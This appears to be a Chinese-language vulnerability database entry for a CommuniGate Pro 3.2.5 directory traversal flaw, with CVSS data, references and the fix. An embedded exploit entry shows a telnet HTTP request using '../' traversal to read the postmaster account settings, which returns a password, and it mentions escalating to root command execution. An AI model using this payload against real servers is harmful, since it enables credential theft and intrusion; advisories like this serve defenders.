发布时间 :2000-04-03 00:00:00
修订时间 :2017-10-09 21:29:13

[原文]The web administration interface for CommuniGate Pro 3.2.5 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) attack.


        CommuniGate Pro 3.2.5及早期的web管理接口存在漏洞,远程攻击者可以通过..攻击读取任意文件。

- CVSS (基础分值)

CVSS分值: 5 [中等(MEDIUM)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)


- OVAL (用于检测的技术细节)


- 官方数据库链接
(官方数据源) MITRE
(官方数据源) NVD
(官方数据源) CNNVD

- 其它链接及资源
(VENDOR_ADVISORY)  BUGTRAQ  20000717 S21SEC-003: Vulnerabilities in CommuniGate Pro v3.2.4
(UNKNOWN)  XF  communigate-pro-file-read

- 漏洞信息

中危 未知
2000-04-03 00:00:00 2010-12-02 00:00:00
        CommuniGate Pro 3.2.5及早期的web管理接口存在漏洞,远程攻击者可以通过..攻击读取任意文件。

- 公告与补丁


- 漏洞信息 (20091)

Stalker Communigate Pro 3.2.4 Arbitrary File Read Vulnerability (EDBID:20091)
multiple remote
2000-04-03 Verified
0 S21Sec
N/A [点击下载]

A vulnerability exists in the CommuniGate Pro product, from Stalker. It is possible to exploit this vulnerability to read arbitrary files on the filesystem. As CommuniGate Pro runs as root, any file can be accessed. Using this flaw, it is possible to gain enough privilege to remotely execute commands as root. 

Retrieve the postmaster/manager configuration file:
homer:~$ telnet ilf 8010
Escape character is '^]'.
GET /Guide/../../../../../../../../../../../var/CommuniGate/Accounts/postmaster.macnt/account.settings HTTP/1.0

HTTP/1.0 200 OK
Content-Length: 61
Date: Mon, 03 Apr 2000 09:17:35 GMT
Content-Type: application/octet-stream
Server: CommuniGatePro/3.2.4
Expires: Tue, 04 Apr 2000 09:17:35 GMT

{ ExternalINBOX = NO; Password = 8093; UseAppPassword = YES;}
Connection closed by foreign host.

Using this information, it is possible to alter the configuration on the mail server to allow execution using its PIPE feature.


- 漏洞信息

CommuniGate Pro Web Interface Arbitrary File Retrieval
Remote / Network Access Input Manipulation
Loss of Confidentiality Upgrade
Exploit Public Third-party Verified

- 漏洞描述

CommuniGate Pro contains a flaw that allows a remote attacker to access files outside of the web path. The issue is due to CommuniGate Pro not properly sanitizing user input, specifically traversal style attacks (../../) supplied via the URI.

- 时间线

2000-07-17 Unknow
2000-07-17 Unknow

- 解决方案

Upgrade to version CommuniGate Pro 3.3 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者